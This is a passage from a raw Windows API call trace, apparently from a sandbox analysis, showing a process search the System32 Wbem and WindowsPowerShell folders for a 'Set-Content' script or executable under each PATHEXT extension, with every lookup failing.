ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x583b237e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x583b237e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1 [0168.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0168.596] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-Content" (normalized: "c:\\windows\\system32\\wbem\\set-content"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.596] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.596] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.596] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-Content.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\set-content.ps1"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.597] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.597] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-Content.psm1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\set-content.psm1"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.597] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.597] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.597] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-Content.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\set-content.psd1"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.598] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.598] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-Content.COM" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\set-content.com"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.598] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.598] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.599] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-Content.EXE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\set-content.exe"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.599] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.599] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-Content.BAT" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\set-content.bat"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.599] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.599] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.600] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-Content.CMD" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\set-content.cmd"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.600] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.600] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-Content.VBS" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\set-content.vbs"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.600] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.600] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.601] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-Content.VBE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\set-content.vbe"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.601] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.601] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-Content.JS" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\set-content.js"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.601] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.601] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.602] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-Content.JSE" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\set-content.jse"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.602] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.602] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-Content.WSF" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\set-content.wsf"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.602] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.602] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.603] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-Content.WSH" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\set-content.wsh"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8cf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.603] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xb156f8d480 | out: lpFileInformation=0xb156f8d480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8d4b97, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8d4b97, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0168.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0xb156f8ced0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b [0168.603] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-Content.MSC" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\set-content.msc"), lpFindFileData=0xb156f8d100 | out: lpFindFileData=0xb156f8d100*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0168.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, 